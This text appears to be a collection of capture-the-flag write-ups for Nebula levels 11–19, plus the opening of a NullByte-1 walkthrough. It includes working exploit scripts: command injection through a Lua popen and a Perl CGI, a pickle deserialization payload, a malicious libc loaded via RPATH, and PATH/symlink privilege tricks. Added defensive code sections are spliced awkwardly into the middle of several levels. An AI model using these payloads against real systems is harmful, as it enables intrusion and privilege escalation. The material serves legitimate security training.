The Python function process() reimplements the C process() routine; de_process() inverts it, producing the input that process() turns into a wanted output.

Note the length check in the small-input path: fread(buf, length, 1, stdin) returns the number of *items* read (1 on success), and that is compared with length, so the path only survives when length is exactly 1. That is why the runs below send a single byte and use a one-character command name (a symlink called c to /bin/getflag, placed first in PATH).

```
def process(buffer_, length):
    '''level11 -- function process'''
    key = length & 0xff
    ret = []

    for s in buffer_:
        _char = ord(s)
        _char ^= key

        d = _char & 0xff
        d = chr(d)

        key -= _char

        ret.append(d)

        # print "%s --> %s key: %s" % (s, d, key)

    return "".join(ret)


def de_process(buffer_, length):
    '''level11 -- decode function process'''
    key = length & 0xff
    ret = []

    for s in buffer_:
        _char = ord(s)
        _char ^= key

        d = _char & 0xff
        d = chr(d)

        key -= (_char ^ key)

        ret.append(d)

        # print "%s --> %s key: %s" % (s, d, key)

    return "".join(ret)
```

Sending the single character b yields c followed by garbage (shown as * below): buf is not zero-initialised, so the decoded byte is followed by whatever was already in that stack memory, and system() sees that as part of the command name. Test runs:


##### Approach 1: length < 1024

```
See exploit_1 below.

level11@nebula:/tmp$ export PATH=/tmp:$PATH
level11@nebula:/tmp$ ln -s /bin/getflag /tmp/c
level11@nebula:/tmp$ echo -ne 'Content-Length: 1\nb\00' | /home/flag11/flag11
0x63
c�
sh: $'c\260\344': command not found
level11@nebula:/tmp$ echo -ne 'Content-Length: 1\nb\00' | /home/flag11/flag11
0x63
c0
sh: $'c0\304': command not found
level11@nebula:/tmp$ echo -ne 'Content-Length: 1\nb\00' | /home/flag11/flag11
0x63
c .
getflag is executing on a non-flag account, this doesn't count

To work around the garbage, the author pre-seeds that memory through the LD_PRELOAD environment variable:

level11@nebula/tmp$: export LD_PRELOAD=`python -c 'print "\x00"*3'` --------> ####

The command now runs, but as the wrong user. The explanation usually given online is that system() does nothing about privileges. More precisely: unlike the other levels, flag11 never calls setresuid(), so only the effective uid is raised and the real uid stays level11; the shell behind /bin/sh here is bash (the $'...' in the error messages above gives it away), and bash resets an effective uid that differs from the real one, so the command runs as level11.
level11@nebula:/tmp$ echo -ne 'Content-Length: 1\nb' | /home/flag11/flag11
uid=1012(level11) gid=1012(level11) groups=1012(level11)
```

##### Approach 2: length >= 1024
```
See exploit_2 below.


Recommends
http://uberskill.blogspot.com/2012/09/nebula-level11.html
http://github.com/1u4nx/Exploit-Exercises-Nebula/
http://v0ids3curity.blogspot.com/2012/12/exploit-exercise-level-11.html
http://hanjc.me/blog/2014/01/26/nebula-level11/
http://cybergibbons.com/security-2/nebula-walkthrough/nebula-exploit-exercises-walkthrough-level11/

http://stackoverflow.com/questions/16258830/does-system-syscall-drop-privileges
```

#### Exploits

Exploit code:
```
#!/usr/bin/env python
# -*- encoding: utf-8 -*-

import os

'''
void process(char *buffer, int length)
{
    unsigned int key;
    int i;
    key = length & 0xff;

    for(i = 0; i < length; i++) {
        buffer[i] ^= key;
        key -= buffer[i];
    }
    system(buffer);
}

'''


def process(buffer_, length):
    '''level11 -- function process'''
    key = length & 0xff
    ret = []

    for s in buffer_:
        _char = ord(s)
        _char ^= key

        d = _char & 0xff
        d = chr(d)

        key -= _char

        ret.append(d)

        # print "%s --> %s key: %s" % (s, d, key)

    return "".join(ret)


def de_process(buffer_, length):
    '''level11 -- decode function process'''
    key = length & 0xff
    ret = []

    for s in buffer_:
        _char = ord(s)
        _char ^= key

        d = _char & 0xff
        d = chr(d)

        key -= (_char ^ key)

        ret.append(d)

        # print "%s --> %s key: %s" % (s, d, key)

    return "".join(ret)


def exploit_1(cmd):
    '''input < 1024'''
    # cmd = "/usr/bin/id"
    _input = 's'

    length = len(_input)
    ret = process(_input, length)

    # Each os.system() call runs in its own shell, so these exports do not
    # reach the shell that later pipes the payload into flag11; set PATH and
    # LD_PRELOAD there by hand (see the transcript above).
    cmds = ['cd /tmp;',
            'rm -f /tmp/%s;' % _input,
            'ln -s %s /tmp/%s;' % (cmd, _input),
            'export PATH=/tmp:$PATH;',
            'export LD_PRELOAD=%s;' % ("\xFF" * (length + 1))]

    [os.system(c) for c in cmds]

    payload = "Content-Length: %d\n%s\00" % (length, ret)

    print payload
    return payload


def exploit_2(cmd):
    '''input >= 1024'''
    _i = 's' + '\00' * 1023
    length = len(_i)
    ret = process(_i, length)

    cmds = ['export TEMP=/tmp;',
            'export LD_PRELOAD=%s' % (length)]

    [os.system(c) for c in cmds]

    payload = "Content-Length: %d\n%s\00" % (length, ret)
    print payload
    return payload


if __name__ == "__main__":
    exploit_1("/usr/bin/id")
    # exploit_2("/usr/bin/id")
```

# Level12

#### About

There is a backdoor process listening on
port 50001.
To do this level, log in as the level12 account with the password level12. Files for this level can be found in /home/flag12.


#### Source code

```
local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 50001))

function hash(password)
	prog = io.popen("echo "..password.." | sha1sum", "r")
	data = prog:read("*all")
	prog:close()

	data = string.sub(data, 1, 40)

	return data
end


while 1 do
	local client = server:accept()
	client:send("Password: ")
	client:settimeout(60)
	local line, err = client:receive()
	if not err then
		print("trying " .. line) -- log from where ;\
		local h = hash(line)

		if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
			client:send("Better luck next time\n");
		else
			client:send("Congrats, your token is 413**CARRIER LOST**\n")
		end

	end

	client:close()
end
```

hash() splices the submitted password into a shell command line for io.popen(), so the real password is never needed: a `|` or `;` in the input runs whatever follows as flag12 (the daemon is started as flag12 from /etc/rc.local, see level03). The injected command's stdout goes down the pipe into sha1sum rather than back to the client, so write it to a file.

#### Solutions

```
nc -v 127.0.0.1 50001
test | /bin/getflag | tee /tmp/level12.txt
cat /tmp/level12.txt
```

#### Exploits

```
#!/usr/bin/env python

import socket

def exploit(host, port):
    tmpfile = "/tmp/7845.yxha"
    payload = "xxx | /bin/getflag > %s \n" % tmpfile
    c = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)

    addr = (host, port)
    c.connect(addr)

    data = c.recv(1024)

    if 'Password' in data:
        print "[+] exploit %s\n%s" % (addr, payload)
        c.sendall(payload)
        # data = c.recv(1024)

        # print data

    c.close()


def main():
    exploit('127.0.0.1', 50001)

if __name__ == "__main__":
    main()
```
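Going back to level08: the password in the hexdump above is only recoverable once the telnet option negotiation is stripped and the DEL keystrokes are replayed. The following is an added example, not part of the original page, written in Python 3; `SAMPLE_STREAM` is assembled from fragments of the dump above (the option negotiation at offset 0x000, the TSPEED subnegotiation at 0x043 and the bytes from `Password: ` onward), and `strip_telnet_commands`, `apply_line_editing` and `extract_password` are names chosen here. The editing replay also honours 0x08 (BS), which the dump does not contain, so it generalises beyond this capture.

```python
"""Recover the password typed in the level08 telnet capture.

Added example, not from the original page.  A telnet stream interleaves IAC
command sequences with terminal data, and the password bytes in the dump
include 0x7f (DEL: the user pressed backspace) and CR NUL line endings.
SAMPLE_STREAM is assembled from fragments of the hexdump above.
"""

IAC, SB, SE = 0xFF, 0xFA, 0xF0
OPTION_NEGOTIATION = (0xFB, 0xFC, 0xFD, 0xFE)   # WILL, WONT, DO, DONT <option>

# Fragments copied from dump.txt: option negotiation (offset 0x000), a TSPEED
# subnegotiation carrying ASCII (0x043), then the prompt and everything the
# user typed after "Password: " (0x190-0x1b3).
SAMPLE_STREAM = (
    bytes.fromhex("fffd25fffc25fffb26")
    + bytes.fromhex("fffa200033383430302c3338343030fff0")
    + b"\r\nPassword: "
    + bytes.fromhex("6261636b646f6f727f7f7f3030526d387f6174650d00")
    + b"\r\nLogin incorrect\r\n"
)


def strip_telnet_commands(data: bytes) -> bytes:
    """Drop IAC command sequences (RFC 854) and return only terminal data."""
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b != IAC:
            out.append(b)
            i += 1
            continue
        if i + 1 >= len(data):
            break                                   # truncated IAC at end of stream
        cmd = data[i + 1]
        if cmd == IAC:                              # IAC IAC: a literal 0xff data byte
            out.append(IAC)
            i += 2
        elif cmd == SB:                             # subnegotiation: skip up to IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            i = len(data) if end < 0 else end + 2
        elif cmd in OPTION_NEGOTIATION:             # three-byte WILL/WONT/DO/DONT
            i += 3
        else:                                       # any other two-byte command
            i += 2
    return bytes(out)


def apply_line_editing(raw: bytes) -> str:
    """Replay keystrokes the way the remote tty's line discipline saw them.

    0x7f (DEL) and 0x08 (BS) erase the previous character, CR ends the line,
    and the NUL telnet sends after a bare CR is padding rather than input.
    """
    typed = []
    for b in raw:
        if b in (0x7F, 0x08):
            if typed:
                typed.pop()
        elif b == 0x0D:
            break
        elif b == 0x00:
            continue
        else:
            typed.append(chr(b))
    return "".join(typed)


def extract_password(stream: bytes, prompt: bytes = b"Password: ") -> str:
    """Find the prompt in the cleaned stream and decode what was typed after it."""
    data = strip_telnet_commands(stream)
    start = data.find(prompt)
    if start < 0:
        raise ValueError("prompt not found")
    return apply_line_editing(data[start + len(prompt):])


if __name__ == "__main__":
    print(extract_password(SAMPLE_STREAM))
```

The same three steps (strip protocol framing, locate the prompt, replay the editing keys) apply to any captured interactive login; Wireshark's "Follow TCP stream" shows you the raw bytes but does not replay DEL for you, which is exactly how `backdOORmate` gets misread from the dump.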
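For level11, the process() routine can be inverted exactly instead of guessing at one-byte inputs. The following is an added example, not code from the original page or from Nebula; it is Python 3 and works on bytes. `nebula_process` models the C loop, `craft_input` is its inverse, and `build_request` prepends the `Content-Length:` header the binary expects; all three names are chosen here. The key is an unsigned int and the buffer a char in C, but only the low 8 bits of the key reach the XOR, and subtracting a sign-extended byte changes those low 8 bits exactly as subtracting the plain byte does, so the whole transform is modelled modulo 256. For the large-input path the program needs the TEMP environment variable set (it creates its scratch file under $TEMP), which the page's exploit_2 also exports.

```python
"""Model of level11's process() and its inverse.

Added example, not from the original page.  process() XORs each byte with a
running key and then subtracts the *output* byte from the key.  Each step is
a bijection on one byte, so the loop can be run backwards to craft an input
that the binary decodes to any command.  Arithmetic is modulo 256: only the
low byte of the unsigned int key ever influences the result.
"""


def nebula_process(data: bytes) -> bytes:
    """Faithful model of process(buffer, length) from the C source."""
    key = len(data) & 0xFF
    out = bytearray()
    for b in data:
        o = b ^ key                 # buffer[i] ^= key  (stored as one byte)
        out.append(o)
        key = (key - o) & 0xFF      # key -= buffer[i]  (low byte is all that matters)
    return bytes(out)


def craft_input(command: bytes, total_length: int = None) -> bytes:
    """Return input that nebula_process() turns into `command` + NUL padding.

    total_length is the body length announced in Content-Length; the decoded
    buffer is the command followed by NULs, so system() sees a terminated
    string.  Use 1024 or more for the mmap path of the binary.
    """
    if total_length is None:
        total_length = len(command)
    if total_length < len(command):
        raise ValueError("total_length shorter than command")
    target = command.ljust(total_length, b"\x00")
    key = total_length & 0xFF
    out = bytearray()
    for o in target:                # o is the byte we want *after* decoding
        out.append(o ^ key)         # the input byte that XORs to it
        key = (key - o) & 0xFF      # same key schedule as the binary
    return bytes(out)


def build_request(command: bytes, total_length: int = None) -> bytes:
    """The stdin the binary expects: Content-Length header, then the body."""
    body = craft_input(command, total_length)
    return b"Content-Length: %d\n" % len(body) + body


if __name__ == "__main__":
    # The page's observation: a 1-byte body 'b' is decoded to 'c'.
    print(nebula_process(b"b"))
    # Large path: 1024 bytes that decode to "/bin/getflag" followed by NULs.
    req = build_request(b"/bin/getflag", 1024)
    print(req[:21], len(req) - 21)
```

Whether the command then runs as flag11 is a separate matter: as discussed above, the binary never calls setresuid(), so crafting the buffer correctly removes the garbage problem but not the privilege one.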
--------------------------------------------------------------------------------
# Level13

#### About

There is a security check that prevents the program from continuing execution if the user invoking it does not match a specific user id.
To do this level, log in as the level13 account with the password level13. Files for this level can be found in /home/flag13.


#### Source code

```
/* the five header names on these include lines were lost in extraction */
#include
#include
#include
#include
#include

#define FAKEUID 1000

int main(int argc, char **argv, char **envp)
{
    int c;
    char token[256];

    if(getuid() != FAKEUID) {
        printf("Security failure detected. UID %d started us, we expect %d\n", getuid(), FAKEUID);
        printf("The system administrators will be notified of this violation\n");
        exit(EXIT_FAILURE);
    }

    // snip, sorry :)

    printf("your token is %s\n", token);

}
```

#### Solutions

* gdb flag13
```
(gdb) disassemble main
break *0x080484f4
run
print $eax
set $eax=1000
print $eax
continue
```

* su flag13 < b705702b-76a8-42b0-8844-3adabbe5ac58


#### Recommends

http://www.yolinux.com/TUTORIALS/GDB-Commands.html
objdump
-------------------------------------------------------------------------------- /CTFS/Nebula/level14.md: --------------------------------------------------------------------------------
# Level14

#### About

This program resides in /home/flag14/flag14. It encrypts input and writes it to standard output. An encrypted token file is also in that home directory, decrypt it :)
To do this level, log in as the level14 account with the password level14. Files for this level can be found in /home/flag14.


#### Source code

There is no source code available for this level

#### Solutions
```
11111111111111111111111111111111111111111111111
123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^`


Output: 8457c118-887c-4e40-a5a6-33a25353165
su flag14 < 8457c118-887c-4e40-a5a6-33a25353165
/bin/getflag
```

#### Exploits

```
#!/usr/bin/env python
# -*- encoding: utf-8 -*-

def main():
    with open('/home/flag14/token', 'r') as f:
        keys = []
        data = f.read().strip()
        for i, j in enumerate(data):
            # each byte was shifted up by its position, so shift it back down
            key = chr(ord(j) - i)
            keys.append(key)

        pwd = "".join(keys)
        return pwd


if __name__ == "__main__":
    # print the recovered token (the original discarded the return value)
    print(main())
```

#### Recommends

How to run a command as a different user?

http://www.cyberciti.biz/open-source/command-line-hacks/linux-run-command-as-different-user/
http://stackoverflow.com/questions/233217/pass-password-to-su-sudo-ssh
http://www.experts-exchange.com/Programming/Languages/Scripting/Python/Q_23048208.html
-------------------------------------------------------------------------------- /CTFS/Nebula/level15.md: --------------------------------------------------------------------------------
# Level15

#### About

strace the binary at /home/flag15/flag15 and see if you spot anything out of the ordinary.
You may wish to review how to “compile a shared library in linux” and how the libraries are loaded and processed by reviewing the dlopen manpage in depth.
Clean up after yourself :)

To do this level, log in as the level15 account with the password level15. Files for this level can be found in /home/flag15.
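Looking back at the level12 server above: its `hash()` pastes the client's line into a string that `io.popen` hands to `/bin/sh`, which is the whole reason a line containing `|` runs as a command. The following is an added example, not code from the original write-up, showing in Python 3 the in-process alternative: the same SHA-1 the server computes (over `password + "\n"`, because `echo` appends a newline), a constant-time comparison against the digest from the Lua source, and a small check a reviewer can run over the server's `trying ...` log lines. `shell_command_built` only reproduces the command string, it never executes it; the function names are assumptions.

```python
import hashlib
import hmac

# Digest the level12 server compares against (taken from the Lua source above).
EXPECTED_SHA1 = "4754a4f4bd5787accd33de887b9250a0691dd198"


def shell_command_built(password: str) -> str:
    """Reproduce the string the Lua hash() hands to io.popen, without running it.

    io.popen goes through /bin/sh, so shell metacharacters in `password`
    ('|', ';', '$(...)') become part of the command line instead of data.
    """
    return "echo " + password + " | sha1sum"


def sha1_like_server(password: str) -> str:
    """Same digest the server computes, produced in-process.

    `echo` appends a newline before piping into sha1sum, so the digest is
    over password + "\\n"; hashlib reproduces that exactly, and the input is
    never interpreted by a shell.
    """
    return hashlib.sha1((password + "\n").encode("utf-8")).hexdigest()


def password_is_valid(password: str, expected_hex: str = EXPECTED_SHA1) -> bool:
    """Constant-time comparison of the digest against the stored value."""
    return hmac.compare_digest(sha1_like_server(password), expected_hex)


def looks_like_injection(line: str) -> bool:
    """Detection hook for the lines the server logs as 'trying ...':
    flag inputs carrying shell metacharacters, which a real password attempt
    has no reason to contain."""
    return any(ch in line for ch in "|;&$`\n")


if __name__ == "__main__":
    attempt = "test | /bin/getflag"
    print("shell would run :", shell_command_built(attempt))
    print("in-process digest:", sha1_like_server(attempt))
    print("valid:", password_is_valid(attempt),
          "suspicious:", looks_like_injection(attempt))
```

`sha1_like_server("test")` yields the same digest as `echo test | sha1sum` on the box, so the fix changes nothing about which password is accepted; it only removes the shell from the path between the socket and the comparison.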


#### Source code

There is no source code available for this level


#### Solutions

```
level15@nebula:~$ objdump -p /home/flag15/flag15

/home/flag15/flag15:     file format elf32-i386

Program Header:
    PHDR off    0x00000034 vaddr 0x08048034 paddr 0x08048034 align 2**2
         filesz 0x00000120 memsz 0x00000120 flags r-x
  INTERP off    0x00000154 vaddr 0x08048154 paddr 0x08048154 align 2**0
         filesz 0x00000013 memsz 0x00000013 flags r--
    LOAD off    0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12
         filesz 0x000005d4 memsz 0x000005d4 flags r-x
    LOAD off    0x00000f0c vaddr 0x08049f0c paddr 0x08049f0c align 2**12
         filesz 0x00000108 memsz 0x00000110 flags rw-
 DYNAMIC off    0x00000f20 vaddr 0x08049f20 paddr 0x08049f20 align 2**2
         filesz 0x000000d0 memsz 0x000000d0 flags rw-
    NOTE off    0x00000168 vaddr 0x08048168 paddr 0x08048168 align 2**2
         filesz 0x00000044 memsz 0x00000044 flags r--
EH_FRAME off    0x000004dc vaddr 0x080484dc paddr 0x080484dc align 2**2
         filesz 0x00000034 memsz 0x00000034 flags r--
   STACK off    0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**2
         filesz 0x00000000 memsz 0x00000000 flags rw-
   RELRO off    0x00000f0c vaddr 0x08049f0c paddr 0x08049f0c align 2**0
         filesz 0x000000f4 memsz 0x000000f4 flags r--

Dynamic Section:
  NEEDED               libc.so.6
  RPATH                /var/tmp/flag15
  INIT                 0x080482c0
  FINI                 0x080484ac
  GNU_HASH             0x080481ac
  STRTAB               0x0804821c
  SYMTAB               0x080481cc
  STRSZ                0x0000005a
  SYMENT               0x00000010
  DEBUG                0x00000000
  PLTGOT               0x08049ff4
  PLTRELSZ             0x00000018
  PLTREL               0x00000011
  JMPREL               0x080482a8
  REL                  0x080482a0
  RELSZ                0x00000008
  RELENT               0x00000008
  VERNEED              0x08048280
  VERNEEDNUM           0x00000001
  VERSYM               0x08048276

Version References:
  required from libc.so.6:
    0x0d696910 0x00 02 GLIBC_2.0

level15@nebula:/var/tmp/flag15$ cat exploit.c
#include
int __libc_start_main(int (*main) (int, char * *, char * *), int argc, char * * ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end)) {
    execl("/bin/getflag", (char *)NULL, (char *)NULL);
}
level15@nebula:/var/tmp/flag15$ gcc -fPIC -g -c exploit.c
level15@nebula:/var/tmp/flag15$ ls -l
total 8
-rw-rw-r-- 1 level15 level15  255 2014-11-22 08:11 exploit.c
-rw-rw-r-- 1 level15 level15 2956 2014-11-22 08:11 exploit.o
level15@nebula:/var/tmp/flag15$ gcc exploit.o -shared -o libc.so.6
level15@nebula:/var/tmp/flag15$ /home/flag15/flag15
/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /home/flag15/flag15)
/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /var/tmp/flag15/libc.so.6)
/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /var/tmp/flag15/libc.so.6)
/home/flag15/flag15: relocation error: /var/tmp/flag15/libc.so.6: symbol __cxa_finalize, version GLIBC_2.1.3 not defined in file libc.so.6 with link time reference
level15@nebula:/var/tmp/flag15$ gcc -fPIC -g -c exploit.c
level15@nebula:/var/tmp/flag15$ gcc -shared -Wl,--version-script,verscript -o libc.so.6 exploit.o
level15@nebula:/var/tmp/flag15$ /home/flag15/flag15
/home/flag15/flag15: /var/tmp/flag15/libc.so.6: version `GLIBC_2.1.3' not found (required by /var/tmp/flag15/libc.so.6)
level15@nebula:/var/tmp/flag15$ gcc -shared -Wl,--version-script,verscript,-Bstatic -static-libgcc -o libc.so.6 exploit.o
level15@nebula:/var/tmp/flag15$ /home/flag15/flag15
You have successfully executed getflag on a target account

level15@nebula:/var/tmp/flag15$ cat exploit.c
#include
int __libc_start_main(int (*main) (int, char * *, char * *), int argc, char * * ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end)) {
    // execl("/bin/getflag", (char *)NULL, (char *)NULL);
    system("/bin/getflag");
}

level15@nebula:/var/tmp/flag15$ gcc -fPIC -g -c exploit.c
level15@nebula:/var/tmp/flag15$ gcc -shared -Wl,--version-script,verscript,-Bstatic -static-libgcc -o libc.so.6 exploit.o
level15@nebula:/var/tmp/flag15$ /home/flag15/flag15
You have successfully executed getflag on a target account
Segmentation fault          ++++++++ Attention Here !!!
```

The header name on the `#include` line of exploit.c and the contents of the `verscript` file did not survive extraction.

#### Recommend

http://www.kroosec.com/2012/11/nebula-level15.html
http://www.yolinux.com/TUTORIALS/LibraryArchives-StaticAndDynamic.html
-------------------------------------------------------------------------------- /CTFS/Nebula/level16.md: --------------------------------------------------------------------------------
# Level16

#### About

There is a perl script running on port 1616.
To do this level, log in as the level16 account with the password level16. Files for this level can be found in /home/flag16.


#### Source code

```
#!/usr/bin/env perl

use CGI qw{param};

print "Content-type: text/html\n\n";

sub login {
    $username = $_[0];
    $password = $_[1];

    $username =~ tr/a-z/A-Z/;   # convert to uppercase
    $username =~ s/\s.*//;      # strip everything after a space

    @output = `egrep "^$username" /home/flag16/userdb.txt 2>&1`;
    foreach $line (@output) {
        ($usr, $pw) = split(/:/, $line);


        if($pw =~ $password) {
            return 1;
        }
    }

    return 0;
}

sub htmlz {
    # the HTML markup inside the strings below was lost in extraction
    print("Login resuls");
    if($_[0] == 1) {
        print("Your login was accepted");
    } else {
        print("Your login failed");
    }
    print("Would you like a cookie?\n");
}

htmlz(login(param("username"), param("password")));
```

#### Solutions

```
echo ${PWD,,}

level16@nebula:~$ ${/BIN/GETFLAG>/TMP/11.TXT,,}
-sh: ${/BIN/GETFLAG>/TMP/11.TXT,,}: bad substitution
level16@nebula:~$ CMD=/BIN/GETFLAG;${CMD,,}
getflag is executing on a non-flag account, this doesn't count

level16@nebula:~$ cat /tmp/exp.sh
#!/bin/bash

/bin/getflag>>/tmp/lv16.txt
level16@nebula:~$ wget http://localhost:1616/index.cgi?username=%22%3C%2FDEV%2FNULL%3BP%3D%2FTMP%2FEXP.SH%3B%24{P%2C%2C}%3B%23&password=
```
-------------------------------------------------------------------------------- /CTFS/Nebula/level17.md: --------------------------------------------------------------------------------
# Level17

#### About

There is a python script listening on port 10007 that contains a vulnerability.
To do this level, log in as the level17 account with the password level17. Files for this level can be found in /home/flag17.


#### Source code

```
#!/usr/bin/python

import os
import pickle
import time
import socket
import signal

signal.signal(signal.SIGCHLD, signal.SIG_IGN)

def server(skt):
    line = skt.recv(1024)

    obj = pickle.loads(line)

    for i in obj:
        clnt.send("why did you send me " + i + "?\n")

skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
skt.bind(('0.0.0.0', 10007))
skt.listen(10)

while True:
    clnt, addr = skt.accept()

    if(os.fork() == 0):
        clnt.send("Accepted connection from %s:%d" % (addr[0], addr[1]))
        server(clnt)
        exit(1)
```

#### Solutions

```
level17@nebula:~$ cat /tmp/lv17.txt
cos
system
(S'getflag > /tmp/pwnie17'
tR.
level17@nebula:~$ nc 192.168.1.106 10007
```

The rest of this session, the end of level17.md and the first 13 lines of level18.md (its About section and the opening of its source listing) were lost in extraction; level18.md resumes below at its include lines.
-------------------------------------------------------------------------------- /CTFS/Nebula/level18.md: --------------------------------------------------------------------------------

```
/* the header names on these include lines were lost in extraction */
#include
#include
#include
#include
#include
#include

struct {
    FILE *debugfile;
    int verbose;
    int loggedin;
} globals;

#define dprintf(...) if(globals.debugfile) \
    fprintf(globals.debugfile, __VA_ARGS__)
#define dvprintf(num, ...) if(globals.debugfile && globals.verbose >= num) \
    fprintf(globals.debugfile, __VA_ARGS__)

#define PWFILE "/home/flag18/password"

void login(char *pw)
{
    FILE *fp;

    fp = fopen(PWFILE, "r");
    if(fp) {
        char file[64];

        if(fgets(file, sizeof(file) - 1, fp) == NULL) {
            dprintf("Unable to read password file %s\n", PWFILE);
            return;
        }
        fclose(fp);
        if(strcmp(pw, file) != 0) return;
    }
    dprintf("logged in successfully (with%s password file)\n",
        fp == NULL ? "out" : "");

    globals.loggedin = 1;

}

void notsupported(char *what)
{
    char *buffer = NULL;
    asprintf(&buffer, "--> [%s] is unsupported at this current time.\n", what);
    dprintf(what);
    free(buffer);
}

void setuser(char *user)
{
    char msg[128];

    sprintf(msg, "unable to set user to '%s' -- not supported.\n", user);
    printf("%s\n", msg);

}

int main(int argc, char **argv, char **envp)
{
    char c;

    while((c = getopt(argc, argv, "d:v")) != -1) {
        switch(c) {
            case 'd':
                globals.debugfile = fopen(optarg, "w+");
                if(globals.debugfile == NULL) err(1, "Unable to open %s", optarg);
                setvbuf(globals.debugfile, NULL, _IONBF, 0);
                break;
            case 'v':
                globals.verbose++;
                break;
        }
    }

    dprintf("Starting up. Verbose level = %d\n", globals.verbose);

    setresgid(getegid(), getegid(), getegid());
    setresuid(geteuid(), geteuid(), geteuid());

    while(1) {
        char line[256];
        char *p, *q;

        q = fgets(line, sizeof(line)-1, stdin);
        if(q == NULL) break;
        p = strchr(line, '\n'); if(p) *p = 0;
        p = strchr(line, '\r'); if(p) *p = 0;

        dvprintf(2, "got [%s] as input\n", line);

        if(strncmp(line, "login", 5) == 0) {
            dvprintf(3, "attempting to login\n");
            login(line + 6);
        } else if(strncmp(line, "logout", 6) == 0) {
            globals.loggedin = 0;
        } else if(strncmp(line, "shell", 5) == 0) {
            dvprintf(3, "attempting to start shell\n");
            if(globals.loggedin) {
                execve("/bin/sh", argv, envp);
                err(1, "unable to execve");
            }
            dprintf("Permission denied\n");
        } else if(strncmp(line, "logout", 4) == 0) {
            globals.loggedin = 0;
        } else if(strncmp(line, "closelog", 8) == 0) {
            if(globals.debugfile) fclose(globals.debugfile);
            globals.debugfile = NULL;
        } else if(strncmp(line, "site exec", 9) == 0) {
            notsupported(line + 10);
        } else if(strncmp(line, "setuser", 7) == 0) {
            setuser(line + 8);
        }
    }

    return 0;
}

```

-------------------------------------------------------------------------------- /CTFS/Nebula/level19.md: --------------------------------------------------------------------------------
# Level19

#### About

There is a flaw in the below program in how it operates.
To do this level, log in as the level19 account with the password level19. Files for this level can be found in /home/flag19.
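The level17 service above hands every client line to `pickle.loads`, and the opcodes in /tmp/lv17.txt (GLOBAL, then REDUCE) are exactly what lets a pickle resolve and call an importable function. The following is an added example, not code from the original write-up, showing the defensive side in Python 3: an `Unpickler` whose `find_class` refuses every global, so data-only pickles still load while any GLOBAL reference is rejected before REDUCE can run it, plus the JSON handler the service could have used instead. The sample pickle here references `os.getcwd` rather than anything harmful and is constructed for the demonstration; the function names are assumptions.

```python
import io
import json
import pickle

# Constructed sample: a protocol-0 pickle that resolves the global os.getcwd
# and calls it with no arguments (opcodes: GLOBAL, MARK, TUPLE, REDUCE, STOP).
# The /tmp/lv17.txt payload above has the same shape with os.system instead.
GLOBAL_CALLING_PICKLE = b"cos\ngetcwd\n(tR."

# Constructed sample of what the service actually expects: a list of strings.
BENIGN_PICKLE = pickle.dumps(["hello", "world"])


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any global.

    pickle only calls find_class for the GLOBAL/STACK_GLOBAL opcodes, so plain
    containers, strings and numbers load normally, while any attempt to
    reference a module attribute raises before REDUCE can call it.
    """

    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            "refusing to resolve global %s.%s in untrusted pickle" % (module, name))


def safe_loads(data: bytes):
    """Drop-in replacement for pickle.loads(data) on untrusted input."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def rejects(data: bytes) -> bool:
    """True when safe_loads refuses the pickle."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


def handle_line(line: bytes) -> list:
    """What the level17 server() loop would reply if it used safe_loads.

    Returns the reply strings instead of sending them so the logic is testable,
    and validates the shape of the object since the loop indexes into it.
    """
    obj = safe_loads(line)
    if not isinstance(obj, list) or not all(isinstance(i, str) for i in obj):
        raise ValueError("expected a list of strings")
    return ["why did you send me " + i + "?\n" for i in obj]


def handle_json_line(line: bytes) -> list:
    """The same handler over JSON, a format with no code-loading opcodes at all."""
    obj = json.loads(line.decode("utf-8"))
    if not isinstance(obj, list) or not all(isinstance(i, str) for i in obj):
        raise ValueError("expected a JSON array of strings")
    return ["why did you send me " + i + "?\n" for i in obj]


if __name__ == "__main__":
    print(handle_line(BENIGN_PICKLE))
    print("global-calling pickle rejected:", rejects(GLOBAL_CALLING_PICKLE))
    print(handle_json_line(b'["hello", "world"]'))
```

The restricted unpickler is the minimal change that keeps the wire format; switching to JSON is the better one, because it removes the class of problem rather than filtering it.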


#### Source code

```
/* the header names on these include lines were lost in extraction */
#include
#include
#include
#include
#include
#include
#include

int main(int argc, char **argv, char **envp)
{
    pid_t pid;
    char buf[256];
    struct stat statbuf;

    /* Get the parent's /proc entry, so we can verify its user id */

    snprintf(buf, sizeof(buf)-1, "/proc/%d", getppid());

    /* stat() it */

    if(stat(buf, &statbuf) == -1) {
        printf("Unable to check parent process\n");
        exit(EXIT_FAILURE);
    }

    /* check the owner id */

    if(statbuf.st_uid == 0) {
        /* If root started us, it is ok to start the shell */

        execve("/bin/sh", argv, envp);
        err(1, "Unable to execve");
    }

    printf("You are unauthorized to run this program\n");
}
```

#### Solutions

```
/* the header names on these include lines were lost in extraction */
#include
#include
#include
#include
#include

int main(void){
    pid_t pid;
    char* args[]= {"/bin/sh", "-c", "getflag > /tmp/flag19", NULL};
    pid = fork();
    if (pid==0){
        nice(19);
        execve("/home/flag19/flag19",args, NULL);
    }else if (pid <0){
        printf("Ups\n");
    }else{
        exit(1);
    }
    return 0;
}
```

#### Recommends

http://securityetalii.es/2012/08/10/soluciones-nebula-niveles-1719/

-------------------------------------------------------------------------------- /CTFS/NullByte/NullByte-1.md: --------------------------------------------------------------------------------
# NullByte-1 Walkthrough #

Scan the internal network for the target IP address; the nullbyte box turns out to be 192.168.10.32.

## Scan Open Ports ##

```
┌─[lab@core]─[/tmp]
└──╼ nmap -v -n -A -p- 192.168.10.32

